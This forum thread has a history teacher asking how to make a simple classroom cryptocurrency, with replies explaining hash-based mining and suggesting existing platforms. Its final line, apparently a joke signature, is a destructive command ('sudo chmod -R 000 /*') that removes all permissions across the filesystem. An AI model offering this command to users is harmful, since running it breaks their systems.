Looking to create simple cryptocurrency for my class

A5000

I'm a history teacher and am looking for a way to create a simple cryptocurrency for the class. I'm not great at programming so any help would be greatly appreciated.

I don't think there's much to show that is "impressive" to anyone who's not a computer/math nerd, since it's mostly just math. If you create your own mining algorithm at the end of the day it's a program that spits out random numbers (run through a hash algorithm). When one of those hashed random numbers satisfies certain criteria (e.g. starts with a certain number of zeros) it is seen as a coin.

The transaction side of things gets a bit more interesting, since you now need to ensure you're the first one to "find" that particular coin and e.g. you need to add more hashes as "proof" to prevent spending of a coin more than once.

As @gabrielcarvfer said, I think it's probably better to spend some time researching how that stuff works and explaining it instead of spending the time to come up with your own variation of a cryptocurrency. Here's an article that might help: https://arstechnica.com/tech-policy/2020/12/how-bitcoin-works/

Remember to either quote or @mention others, so they are notified of your reply

You don't need to implement your own blockchain, you can emit a new token on an existing one like Ethereum. It's not a beginner level task though. I don't think it would add much to your history class to show a bunch of code even if you pull it off.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*